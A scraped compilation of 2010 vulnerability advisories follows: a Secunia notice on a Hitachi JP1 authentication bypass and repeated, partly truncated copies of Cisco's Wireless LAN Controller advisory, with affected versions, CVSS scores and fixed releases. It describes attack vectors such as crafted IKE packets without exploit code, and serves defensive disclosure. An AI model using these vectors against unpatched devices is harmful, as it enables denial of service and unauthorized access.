http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in JP1/Remote Control Agent, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an unspecified error in the file transfer feature and can be exploited to bypass authentication. Please see the vendor's advisory for the list of affected products. SOLUTION: Apply patches. Please see the vendor's advisory for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Hitachi (HS10-025): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS10-025/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco Wireless LAN Controller (WLC) software 3.2 before 3.2.215.0; 4.1 and 4.2 before 4.2.205.0; 4.1M and 4.2M before 4.2.207.54M; 5.0, 5.1, and 6.0 before 6.0.188.0; and 5.2 before 5.2.193.11 allows remote attackers to cause a denial of service (device reload) via a crafted IKE packet, aka Bug ID CSCta56653. An attacker could send a malformed IKE message to the affected Cisco WLC to crash or reload the device. This vulnerability can be exploited from both wireless and wired segments. This issue is tracked by Cisco Bug ID CSCta56653. http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&amp;bugId=CSCsq24002. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. CPU ACL Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One of the two ACL bypass vulnerabilities affects Cisco WLC software versions 4.1 and later. The second ACL bypass vulnerability affects Cisco WLC software versions 6.0.x. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. The Cisco WLC family of devices is affected by 2 denial of service vulnerabilities, 3 privilege escalation vulnerabilities, and 2 access control list bypass vulnerabilities. The following are the details about these vulnerabilities. Note: IKE is enabled by default in the WLC and cannot be disabled. Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. A TCP three-way handshake is needed in order to exploit this vulnerability. Note: Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Three privilege escalation vulnerabilities exist in the Cisco WLCs that could allow an authenticated attacker with read-only privileges to modify the device configuration. Access Control List Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ACLs can be configured in the Cisco WLCs and applied to data traffic to and from wireless clients or to all traffic that is destined for the controller CPU. After ACLs are defined, they can be applied to the management interface, the access point manager (AP-manager) interface, or any of the dynamic interfaces for client data traffic or to the Network Processing Unit (NPU) interface for traffic to the controller CPU. Two vulnerabilities exist in the Cisco WLCs that could allow an unauthenticated attacker to bypass policies that should be enforced by CPU-based ACLs. No other ACL types are affected by these vulnerabilities. Note: CPU-based ACLs are configured and applied by navigating to Security > Access Control Lists > CPU Access Control Lists in the Cisco WLC web management interface. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the privilege escalation vulnerabilities could allow an authenticated attacker with read-only privileges to modify the device configuration. Successful exploitation of the ACL bypass vulnerabilities could allow an attacker to bypass policies that should be enforced by CPU-based ACLs. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Cisco Wireless LAN Controller (WLC) software, possibly 6.0.x or possibly 4.1 through 6.0.x, allows remote attackers to bypass ACLs in the controller CPU, and consequently send network traffic to unintended segments or devices, via unspecified vectors, a different vulnerability than CVE-2010-3034. Cisco Wireless LAN Controller (WLC) The controller CPU Vulnerabilities exist in which access restrictions can be bypassed. After defining the ACLs, it can be referenced on the management interface, on the access point management (AP-manager) interface, and any dynamic interface for client data communication or a network processing unit (NPU) interface to the controller CPU. Two security vulnerabilities in Cisco WLCs allow unauthenticated attackers to bypass CPU-based ACLs. An attacker can exploit this issue to bypass certain security restrictions. This issue is being tracked by Cisco BugID CSCta66931. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. The Cisco WLC family of devices is affected by 2 denial of service vulnerabilities, 3 privilege escalation vulnerabilities, and 2 access control list bypass vulnerabilities. The following are the details about these vulnerabilities. IKE Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An attacker with the ability to send a malicious IKE packet to an affected Cisco WLC could cause the device to crash and reload. This vulnerability can be exploited from both wired and wireless segments. Note: IKE is enabled by default in the WLC and cannot be disabled. Transient traffic will not trigger this vulnerability. This vulnerability is documented in Cisco Bug ID CSCta56653 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-0574. HTTP Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An authenticated attacker with the ability to send a series of malicious HTTP packets to an affected Cisco WLC could cause the device to reload. This vulnerability can be exploited from both wired and wireless segments. A TCP three-way handshake is needed in order to exploit this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID CSCtd16938 and has been assigned CVE ID CVE-2010-2841. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Three privilege escalation vulnerabilities exist in the Cisco WLCs that could allow an authenticated attacker with read-only privileges to modify the device configuration. These vulnerabilities are documented in Cisco Bug IDs CSCtc91431, CSCsz66726, and CSCtc93837; and have been assigned CVE IDs CVE-2010-2842, CVE-2010-2843, and CVE-2010-3033. No other ACL types are affected by these vulnerabilities. When CPU-based ACLs are enabled, they are applicable to both wireless and wired traffic. These vulnerabilities are documented in Cisco Bug IDs CSCta66931, and CSCtf36051; and have been assigned CVE IDs CVE-2010-0575 and CVE-2010-3034. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the privilege escalation vulnerabilities could allow an authenticated attacker with read-only privileges to modify the device configuration. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | 